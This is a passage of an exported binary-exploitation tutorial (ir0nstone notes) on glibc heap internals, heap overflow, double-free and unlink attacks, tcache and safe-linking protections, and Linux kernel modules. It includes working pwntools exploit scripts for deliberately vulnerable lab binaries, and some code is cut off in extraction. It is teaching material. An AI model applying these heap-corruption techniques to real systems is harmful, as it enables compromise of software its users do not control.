There is only one of these. When small and large chunks are freed, they end of in this
bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc
requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces
and return one of them, speeding up the process - this is the Last Remainder Chunk. If
the chunk requested is larger, then the chunks in this bin get moved to the respective
Small/Large bins.
Small Bins
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the
same size are stored in the same bins. Small bins are doubly-linked and allocation and
deallocation is FIFO.
The purpose of the FD and BK pointers as we saw before are to points to the chunks
ahead and behind in the bin.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 161/240
4/10/24, 12:28 PM Binary Exploitation
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to
each other in memory) can coalesce (consolidate), meaning their sizes combine and
become a bigger chunk.
Large Bins
63 large bins, can store chunks of different sizes. The free chunks are ordered in
decreasing order of size, meaning insertions and deletions can occur at any point in the
list.
Like small chunks, large chunks can coalesce together before ending up in the unsorted
bin.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 162/240
4/10/24, 12:28 PM Binary Exploitation
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added
to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which
points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk
in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it
is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of
the list
Let's have a visual demonstration (it will help)! Try out the following C program:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 163/240
4/10/24, 12:28 PM Binary Exploitation
#include <stdio.h>
#include <stdlib.h>
int main() {
char *a = malloc(20);
char *b = malloc(20);
char *c = malloc(20);
puts("Freeing...");
free(a);
free(b);
free(c);
puts("Allocating...");
char *d = malloc(20);
char *e = malloc(20);
char *f = malloc(20);
We get:
a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 164/240
4/10/24, 12:28 PM Binary Exploitation
It can be really confusing as to why we add and remove chunks from the start of the list
(why not the end?), but it's really just the most efficient way to add an element. Let's
say we have this fastbin setup:
In this case HEAD points to a , and a points onwards to b as the next chunk in the
bin (because the fd field of a points to b ). Now let's say we free another chunk
c . If we want to add it to the end of the list like so:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 165/240
4/10/24, 12:28 PM Binary Exploitation
This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c , making it the head of the list
For reallocating the chunk, the same principle applies - it's much easier to update HEAD
to point to a by reading the fd of c than it is to traverse the entire list until it gets
to the end.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 166/240
4/10/24, 12:28 PM Binary Exploitation
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
TODO
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 167/240
4/10/24, 12:28 PM Binary Exploitation
Malloc State
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 168/240
4/10/24, 12:28 PM Binary Exploitation
Heap Overflow
Heap Overflow, much like a Stack Overflow, involves too much data being written to
the heap. This can result in us overwriting data, most importantly pointers. Overwriting
these pointers can cause user input to be copied to different locations if the program
blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable
binaries from Protostar.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 169/240
4/10/24, 12:28 PM Binary Exploitation
heap0
http://exploit.education/phoenix/heap-zero/
Source
Luckily it gives us the source:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 170/240
4/10/24, 12:28 PM Binary Exploitation
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
char name[64];
};
struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];
};
void winner() {
printf("Congratulations, you have passed this level\n");
}
void nowinner() {
printf(
"level has not been passed - function pointer has not been "
"overwritten\n");
}
if (argc < 2) {
printf("Please specify an argument to copy :-)\n");
exit(1);
}
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
strcpy(d->name, argv[1]);
f->fp();
return 0;
}
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 171/240
4/10/24, 12:28 PM Binary Exploitation
Analysis
So let's analyse what it does:
The weakness here is clear - it runs a random address on the heap. Our input is copied
there after the value is set and there's no bound checking whatsoever, so we can
overrun it easily.
Regular Execution
We'll break right after the strcpy and see how it looks.
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 172/240
4/10/24, 12:28 PM Binary Exploitation
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 173/240
4/10/24, 12:28 PM Binary Exploitation
So, we can see that the function address is there, after our input in memory. Let's work
out the offset.
Since we want to work out how many characters we need until the pointer, I'll just use a
De Bruijn Sequence.
$ ragg2 -P 200 -r
$ r2 -d -A heap0 AAABAACAADAAE...
Let's break on and after the strcpy . That way we can check the location of the
pointer then immediately read it and calculate the offset.
[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 174/240
4/10/24, 12:28 PM Binary Exploitation
So, the chunk with the pointer is located at 0x2493060 . Let's continue until the next
breakpoint.
[0x0040075d]> dc
hit breakpoint at: 0x400762
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 175/240
4/10/24, 12:28 PM Binary Exploitation
Notice we overwrote the size field, so the chunk is much bigger. But now we can
easily use the first value to work out the offset (we could also, knowing the location,
have done pxq @ 0x02493060 ).
Exploit
from pwn import *
p = elf.process(argv=[payload])
print(p.clean().decode('latin-1'))
We need to remove the null bytes because argv doesn't allow them
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 176/240
4/10/24, 12:28 PM Binary Exploitation
heap1
http://exploit.education/phoenix/heap-one/
Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
struct heapStructure {
int priority;
char *name;
};
i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
void winner() {
printf(
"Congratulations, you've completed this level @ %ld seconds past th
"Epoch\n",
time(NULL));
}
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 177/240
4/10/24, 12:28 PM Binary Exploitation
Analysis
This program:
Prints something
Regular Execution
As we expected, we have two pairs of heapStructure and name chunks. We know the
strcpy will be copying into wherever name points, so let's read the contents of the
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 178/240
4/10/24, 12:28 PM Binary Exploitation
Look! The name pointer points to the name chunk! You can see the value 0x602030
being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the
chunk. But now we're certain, and we can definitely overwrite this pointer due to the
lack of bounds checking. And because we can also control the value being written, this
essentially gives us an arbitrary write!
Exploitation
The plan, therefore, becomes:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 179/240
4/10/24, 12:28 PM Binary Exploitation
But what function should we overwrite? The only function called after the strcpy is
printf , according to the source code. And if we overwrite printf with winner it'll
just recursively call itself forever.
Luckily, compilers like gcc compile printf as puts if there are no parameters - we
can see this with radare2:
$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x40
0x004006f0 e8fbfdffff call sym.imp.puts
So we can simply overwrite the GOT address of puts with winner . All we need to
find now is the padding until the pointer and then we're good to go.
$ ragg2 -P 200 -r
AABAA...
Break on and after the strcpy again and analyse the second chunk's name pointer.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 180/240
4/10/24, 12:28 PM Binary Exploitation
The pointer is originally at 0x8d9050 ; once the strcpy occurs, the value there is
0x41415041414f4141 .
Final Exploit
p = elf.process(argv=[param1, param2])
print(p.clean().decode('latin-1'))
Again, null bytes aren't allowed in parameters so you have to remove them.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 181/240
4/10/24, 12:28 PM Binary Exploitation
Use-After-Free
Much like the name suggests, this technique involves us using data once it is freed. The
weakness here is that programmers often wrongly assume that once the chunk is freed
it cannot be used and don't bother writing checks to ensure data is not freed. This
means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 182/240
4/10/24, 12:28 PM Binary Exploitation
Double-Free
Overview
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in
the bin is specified by the fd pointer. This means if chunk a points to chunk b ,
once chunk a is freed the next chunk in the bin is chunk b .
Controlling fd
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:
char *a = malloc(0x20);
free(a);
free(a);
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 183/240
4/10/24, 12:28 PM Binary Exploitation
Fairly logical.
But what happens if we called malloc() again for the same size?
char *b = malloc(0x20);
Well, strange things would happen. a is both allocated (in the form of b ) and free
at the same time.
If you remember, the heap attempts to save as much space as possible and when the
chunk is free the fd pointer is written where the user data used to be.
When we write into the use data of b , we're writing into the fd of a at the same
time.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 184/240
4/10/24, 12:28 PM Binary Exploitation
And remember - controlling fd means we can control where the next chunk gets
allocated!
So we can write an address into the data of b , and that's where the next chunk gets
placed.
strcpy(b, "\x78\x56\x34\x12");
Now, the next alloc will return a again. This doesn't matter, we want the one
afterwards.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 185/240
4/10/24, 12:28 PM Binary Exploitation
Double-Free Protections
It wouldn't be fun if there were no protections, right?
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
free(a);
free(a);
return 1;
}
Is the chunk at the top of the bin the same as the chunk being inserted?
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 186/240
4/10/24, 12:28 PM Binary Exploitation
When removing the chunk from a fastbin, make sure the size falls into the fastbin's
range
The previous protection could be bypassed by freeing another chunk in between the
double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd with something like 0x08041234 , you have to make sure
the metadata fits - i.e. the size ahead of the data is completely correct - and that makes
it harder, because you can't just write into the GOT, unless you get lucky.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 187/240
4/10/24, 12:28 PM Binary Exploitation
Double-Free Exploit
Still on Xenial Xerus, means both mentioned checks are still relevant. The bypass for
the second check (malloc() memory corruption) is given to you in the form of fake
metadata already set to a suitable size. Let's check the (relevant parts of) the source.
Analysis
Variables
The fakemetadata variable is the fake size of 0x30 , so you can focus on the double-
free itself rather than the protection bypass. Directly after this is the admin variable,
meaning if you pull the exploit off into the location of that fake metadata, you can just
overwrite that as proof.
users is a list of strings for the usernames, and userCount keeps track of the length
of the array.
main_loop()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 188/240
4/10/24, 12:28 PM Binary Exploitation
void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}
Prompts for input, takes in input. Note that main() itself prints out the location of
fakemetadata , so we don't have to mess around with that at all.
createUser()
void createUser() {
char *name = malloc(0x20);
users[userCount] = name;
createUser() allocates a chunk of size 0x20 on the heap (real size is 0x30 including
metadata, hence the fakemetadata being 0x30 ) then sets the array entry as a
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 189/240
4/10/24, 12:28 PM Binary Exploitation
deleteUser()
void deleteUser() {
printf("Index: ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
Get index, print out the details and free() it. Easy peasy.
complete_level()
void complete_level() {
if(strcmp(admin, "admin\n")) {
puts("Level Complete!");
return;
}
}
Checks you overwrote admin with admin , if you did, mission accomplished!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 190/240
4/10/24, 12:28 PM Binary Exploitation
Exploitation
There's literally no checks in place so we have a plethora of options available, but this
tutorial is about using a double-free, so we'll use that.
Setup
First let's make a skeleton of a script, along with some helper functions:
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
As we know with the fasttop protection, we can't allocate once then free twice - we'll
have to free once inbetween.
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 191/240
4/10/24, 12:28 PM Binary Exploitation
Let's check the progression of the fastbin by adding a pause() after every delete() .
We'll hook on with radare2 using
r2 -d $(pidof vuln)
delete(0) #1
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of
using dmhf 2 ( dmhf analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000 . Let's keep going.
delete(1)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 192/240
4/10/24, 12:28 PM Binary Exploitation
The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being
located at 0xd58030 .
delete(0) #2
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is
nice enough to point out there's a double-free.
Now we have a double-free, let's allocate Chunk 0 again and put some random data.
Because it's also considered free, the data we write is seen as being in the fd pointer
of the chunk. Remember, the heap saves space, so fd when free is located exactly
where data is when allocated (probably explained better here).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 193/240
4/10/24, 12:28 PM Binary Exploitation
So let's write to fd , and see what happens to the fastbin. Remove all the pause()
instructions.
create(p64(0x08080808))
pause()
The last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also
parse the fakemetadata location at the beginning of the exploit chain.
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
[...]
create('junk1')
create('junk2')
pause()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 194/240
4/10/24, 12:28 PM Binary Exploitation
The reason we have to subtract 8 off fakemetadata is that the only thing we faked in
the souce is the size field, but prev_size is at the very front of the chunk metadata.
If we point the fastbin freelist at the fakemetadata variable it'll interpret it as
prev_size and the 8 bytes afterwards as size , so we shift it all back 8 to align it
correctly.
Now we can control where we write, and we know where to write to.
First, let's replace the location we write to with where we want to:
create(p64(fake_metadata))
Now let's finish it off by creating another user. Since we control the fastbin, this user
gets written to the location of our fake metadata, giving us an almost arbitrary write.
create('\x00' * 8 + 'admin\x00')
complete()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 195/240
4/10/24, 12:28 PM Binary Exploitation
The 8 null bytes are padding. If you read the source, you notice the metadata string is 16
bytes long rather than 8, so we need 8 more padding.
$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 196/240
4/10/24, 12:28 PM Binary Exploitation
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
create(p64(fake_metadata))
create('junk1')
create('junk2')
create('\x00' * 8 + 'admin\x00')
complete()
32-bit
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit
different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try
it yourself :)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 197/240
4/10/24, 12:28 PM Binary Exploitation
Unlink Exploit
Overview
When a chunk is removed from a bin, unlink() is called on the chunk. The unlink
macro looks like this:
We want to write the value 0x1000000c to 0x5655578c . If we had the ability to create
a fake free chunk, we could choose the values for fd and bk . In this example, we
would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for
the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk
to 0x10000000 . Then when we unlink() this fake chunk, the process is as follows:
FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)
This may seem like a lot to take in. It's a lot of seemingly random numbers. What you
need to understand is P->fd just means 8 bytes off P and P->bk just means 12
bytes off P .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 198/240
4/10/24, 12:28 PM Binary Exploitation
Then the fd and bk pointers point at the start of the chunk - prev_size . So when
overwriting the fd pointer here:
FD points to 0x56555780 , and then 0xc gets added on for bk , making the write
actually occur at 0x5655578c , which is what we wanted. That is why we fake fd and
bk values lower than the actual intended write location.
In 64-bit, all the chunk data takes up 0x8 bytes each, so the offsets for fd and bk will
be 0x10 and 0x18 respectively.
The slight issue with the unlink exploit is not only does fd get written to where you
want, bk gets written as well - and if the location you are writing either of these to is
protected memory, the binary will crash.
Protections
More modern libc versions have a different version of the unlink macro, which looks like
this:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 199/240
4/10/24, 12:28 PM Binary Exploitation
FD = P->fd;
BK = P->bk;
Here unlink() check the bk pointer of the forward chunk and the fd pointer of the
backward chunk and makes sure they point to P , which is unlikely if you fake a chunk.
This quite significantly restricts where we can write using unlink.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 200/240
4/10/24, 12:28 PM Binary Exploitation
Tcache Keys
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in
the tcache_entry struct, the key :
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
When a chunk is freed and tcache_put() is called on it, the key field is set to the
location of the tcache_perthread_struct . Why is this relevant? Let's check the tcache
security checks in _int_free() :
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 201/240
4/10/24, 12:28 PM Binary Exploitation
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
The chunk being freed is variable e . We can see here that before tcache_put() is
called on it, there is a check being done:
The check determines whether the key field of the chunk e is set to the address of
the tcache_perthread_struct already. Remember that this happens when it is put
into the tcache with tcache_put() ! If the pointer is already there, there is a very
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 202/240
4/10/24, 12:28 PM Binary Exploitation
high chance that it's because the chunk has already been freed, in which case it's a
double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches
random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting.
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
Iterates through each entry, calls it tmp and compares it to e . If equal, it detected a
double-free.
You can think of the key as an effectively random value (due to ASLR) that gets checked
against, and if it's the correct value then something is suspicious.
So, what can we do against this? Well, this protection doesn't affect us that much - it
stops a simple double-free, but if we have any kind of UAF primitive we can easily
overwrite e->key . Even with a single byte, we still have a 255/256 chance of
overwriting it to something that doesn't match key . Creating fake tcache chunks
doesn't matter either, as even in the latest glibc version there is no key check in
tcache_get() , meaning tcache poisoning is still doable.
In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is
mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 203/240
4/10/24, 12:28 PM Binary Exploitation
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
What is tcache_key ? It's defined here and set directly below, in the
tcache_key_initialise() function:
It attempts to call __getrandom() , which is defined as a stub here and for Linux here;
it just uses a syscall to read n random bytes. If that fails for some reason, it calls the
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 204/240
4/10/24, 12:28 PM Binary Exploitation
This isn't a huge change - it's still only straight double-frees that are affected. We can
no longer leak the heap via the key , however.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 205/240
4/10/24, 12:28 PM Binary Exploitation
Safe Linking
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect
the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd
pointer of free chunks in these bins with a mangling operation, making it more difficult
to overwrite it with an arbitrary value.
Here, pos is the location of the current chunk and ptr the location of the chunk we
are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are
using ASLR to protect! The >>12 gets rid of the predictable last 12 bits of ASLR,
keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are
pretty predictable):
It's a very rudimentary protection - we use the current location and the location we
point to in order to mangle it. From a programming standpoint, it has virtually no
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 206/240
4/10/24, 12:28 PM Binary Exploitation
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in
PROTECT_PTR , and we can easily recreate it to fake our own mangled pointer.
It might be tempting to say that a partial overwrite is still possible, but there is a new
security check that comes along with this Safe-Linking mechanism, the alignment
check. This check ensures that chunks are 16-bit aligned and is only relevant to singly-
linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned in malloc.c will
bring up plenty of different locations. The most important ones for us as attackers is
probably the one in tcache_get() and the ones in _int_malloc() .
tcache_get
_int_malloc()
There are three checks here. First on REMOVE_FB , the macro for removing a chunk
from a fastbin:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 207/240
4/10/24, 12:28 PM Binary Exploitation
And lastly on every fastbin chunk during the movement over to the respective
tcache bin:
_int_free()
malloc_consolidate()
When all the fastbins are consolidated into the unsorted bin, they are checked for
alignment:
Others
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 208/240
4/10/24, 12:28 PM Binary Exploitation
Not super important functions for attackers, but fastbin chunks are checked for
alignment in int_mallinfo() , __malloc_info() , do_check_malloc_state() ,
tcache_thread_shutdown() .
You may notice some of them use !aligned_OK while others use
misaligned_chunk() .
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)
The macros are defined side-by-side, but really aligned_OK is for addresses while
misaligned_chunk is for chunks.
This alignment check means you would have to guess 16 bits of entropy, leading to a
1/16 chance if you attempt to brute-force the last 16 bits to be
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 209/240
4/10/24, 12:28 PM Binary Exploitation
Kernel
Heavily beta
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 210/240
4/10/24, 12:28 PM Binary Exploitation
Introduction
The kernel is the program at the heart of the Operating System. It is responsible for
controlling every aspect of the computer, from the nature of syscalls to the integration
between software and hardware. As such, exploiting the kernel can lead to some
incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of
kernel modules. This is an integral feature of Linux that allows users to extend the
kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow
here, and I recommend it highly.
Kernel Modules
Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most
kernel modules are compiled for a specific version kernel version (which can be checked
with uname -r , my Xenial Xerus is 4.15.0-128-generic ). We can load and unload
these modules using the insmod and rmmod commands respectively. Kernel modules
are often loaded into /dev/* or /proc/ . There are 3 main module types: Char, Block
and Network.
Char Modules
Char Modules are deceptively simple. Essentially, you can access them as a stream of
bytes - just like a file - using syscalls such as open . In this way, they're virtually almost
dynamic files (at a super basic level), as the values read and written can be changed.
I'll be using the term module and device interchangeably. As far as I can tell, they are the
same, but please let me know if I'm wrong!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 211/240
4/10/24, 12:28 PM Binary Exploitation
The Code
Writing a Char Module is suprisingly simple. First, we specify what happens on init
(loading of the module) and exit (unloading of the module). We need some special
headers for this.
#include <linux/init.h>
#include <linux/module.h>
MODULE_LICENSE("Mine!");
module_init(intro_init);
module_exit(intro_exit);
First we set the license, because otherwise we get a warning, and I hate warnings. Next
we tell the module what to do on load ( intro_init() ) and unload ( intro_exit() ).
Note we put parameters as void , this is because kernel modules are very picky about
requiring parameters (even if just void).
Note that we use printk rather than printf . GLIBC doesn't exist in kernel mode,
and instead we use C's in-built kernel functionality. KERN_ALERT is specifies the type of
message sent, and there are many more types.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 212/240
4/10/24, 12:28 PM Binary Exploitation
Compiling
Compiling a Kernel Object can seem a little more complex as we use a Makefile , but
it's surprisingly simple:
obj-m += intro.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
We use make to compile the module. The files produced are defined at the top as
obj-m . Note that compilation is unique per kernel, which is why the compiling process
uses your unique kernel build section.
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran
it, nor does it bother communicating with userspace. Instead, this code runs in the
kernel, and we can check the output using sudo dmesg .
Here we grab the last line using tail - as you can see, our printk is called!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 213/240
4/10/24, 12:28 PM Binary Exploitation
You can view currently loaded modules using the lsmod command
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 214/240
4/10/24, 12:28 PM Binary Exploitation
A major number is essentially the unique identifier to the kernel module. You can
specify it using the first parameter of register_chrdev , but if you pass 0 it is
automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite
understand what they do, but this code exposes the module to /dev/intro .
Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 215/240
4/10/24, 12:28 PM Binary Exploitation
Controlling I/O
In intro_init , the first line may have been confusing:
The third parameter fops is where all the magic happens, allowing us to create
handlers for operations such as read and write . A really simple one would look
something like:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 216/240
4/10/24, 12:28 PM Binary Exploitation
The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line
up to the 2nd and 3rd parameters for the read() function itself:
We then use the function copy_to_user to write QWERTY to the buffer passed in as a
parameter!
Full Code
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 217/240
4/10/24, 12:28 PM Binary Exploitation
If the module is successfully loaded, the read() call should read QWERTY into
buffer :
Success!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 218/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 219/240
4/10/24, 12:28 PM Binary Exploitation
The Module
We're going to create a really basic authentication module that allows you to read the
flag if you input the correct password. Here is the relevant code:
If we attempt to read() from the device, it checks the authenticated flag to see if it
can return us the flag. If not, it sends back FAIL: Not Authenticated! .
Interacting
Let's first try and interact with the kernel by reading from it.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 220/240
4/10/24, 12:28 PM Binary Exploitation
Note that in the module source code, the length of read() is completely disregarded, so
we could make it any number at all! Try switching it to 1 and you'll see.
Epic! Let's write the correct password to the device then try again. It's really important
to send the null byte here! That's because copy_from_user() does not automatically
add it, so the strcmp will fail otherwise!
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 221/240
4/10/24, 12:28 PM Binary Exploitation
It works!
The state is preserved between connections! Because the kernel module remains on,
you will be authenticated until the module is reloaded (either via rmmod then insmod ,
or a system restart).
Final Code
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 222/240
4/10/24, 12:28 PM Binary Exploitation
Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead.
Then write a program to interact with it and perform the same operations. ZIP file
including both below, but no cheating! This is really good practise.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 223/240
4/10/24, 12:28 PM Binary Exploitation
Double-Fetch
The most simple of vulnerabilities
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 224/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 225/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 226/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 227/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 228/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 229/240
4/10/24, 12:28 PM Binary Exploitation
Other
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 230/240
4/10/24, 12:28 PM Binary Exploitation
Loading...
